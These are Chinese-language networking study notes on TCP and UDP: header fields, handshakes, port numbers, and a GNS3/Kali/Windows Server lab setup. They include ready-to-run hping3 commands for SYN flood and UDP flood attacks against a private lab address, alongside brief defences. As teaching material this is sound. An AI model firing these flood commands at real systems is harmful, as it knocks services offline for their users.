傳輸層協議
1.TCP
2.UDP
TCP協議
回顧內容
- 傳輸層功能:定義應用層協議數據報文的端口號,流量控制
- 對原始數據進行分段處理
傳輸層所提供服務
- 傳輸連接服務
- 數據傳輸服務:流量控制、差錯控制、序列控制
一、傳輸層的TCP協議
1.面向連接的傳輸協議
- 要求數據在傳輸以前必須建立連接,數據傳輸后,必須釋放連接
- 僅支持單播傳輸,在兩個終端之間建立的點對點連接
2.UDP用戶數據報協議
二、TCP報文字段
字段含義:TCP報文格式詳解,圖解超詳細!
【計算機網絡】TCP協議——1.報文格式詳解_tcp報文-CSDN博客
1.建立三次握手
2.TCP釋放連接的四次揮手
3.TCP半關閉狀態
4.TCP半連接狀態
會產生SYN flood,屬于DoS的一種。
5.常見TCP端口號
- 21 FTP
- 22 SSH
- 23 TELNET
- 25 SMTP
- 53 DNS
- 80 HTTP
- 110 POP3
- 143 IMAP4
- 443 HTTPS
- 3306 MYSQL
- 3389 RDP
三、實施SYN flood
實施:
- 在kali上使用hping3工具
防御:
- 使用TCP代理(防火墻),比如10G的帶寬,需要很多個w
- TCP源探測,防火墻開啟該功能,下一代防火墻
1.GNS3中
-
安裝好GNS3之后,進行配置
#進入路由器中
2.kali中
輸入:進入vim
#在kali中,將網段設置成VMnet1
vim /etc/...
#按下A鍵
#寫入
auto eth0
iface eth0 inet static
address 192.168.1.50
netmask 255.255.255.0
gateway 192.168.1.254
#寫完后按下esc鍵,:
:wq! #保存并退出ifdown eth0 #關閉網口
ifup eth0 #打開網口
ifconfig #查看kali的IP地址
route -n #查看路由表
#在Windows server 2016中,將網絡設置為VMnet8
#W配置IP地址
#進入cmd
netsh interface ip set address "Ethernet0" static 192.168.2.100 255.255.255.0 192.168.2.254
ipconfig
#在kali中實施攻擊
hping -c 1000 -d 200 -S -w 64 -p 80 --flood --rand-source 192.168.2.100
四、Windows Server 2016搭建網站
- 打開服務器管理器
- 管理
- 添加角色和功能
- 下一步,下一步
- 服務器選擇:下一步
- 勾選web服務器,添加功能,下一步
- 一直下一步,直到安裝
五、安裝GNS3
超詳細GNS3安裝和使用教程,避免各種報錯 - ghbuff - 博客園
【CCNP | 網絡模擬器GNS系列】安裝、配置和使用 GNS3_gns3的安裝步驟及導入路由器鏡像的過程-CSDN博客
UDP協議
UDP(用戶數據報)協議,是傳輸層的另外一個協議
一、簡單概念
1、特點
不需要建立連接,直接發送數據,不會去重新排序,不需要確認
2、報文字段
- 源端口
- 目標端口
- UDP長度
- UDP校驗和
3、常見的UDP端口號
- 53 DNS
- 69 TFTP
- 111 RPC
- 123 NTP
- 161 SNMP
二、實施UDP Flood攻擊
配置路由器IP
在Windows中
netstat -anop udp
開啟53號端口
在kali中實施攻擊
hping3 -q -n --rand-source --udp -p 53 --flood 192.168.2.100 -d 10000
)
![[數據處理] 3. 數據集讀取](http://pic.xiahunao.cn/[數據處理] 3. 數據集讀取)
文本到圖像的生成和編輯:綜述)
——從 Image-Text Pair 到 Instruction-Following 格式)
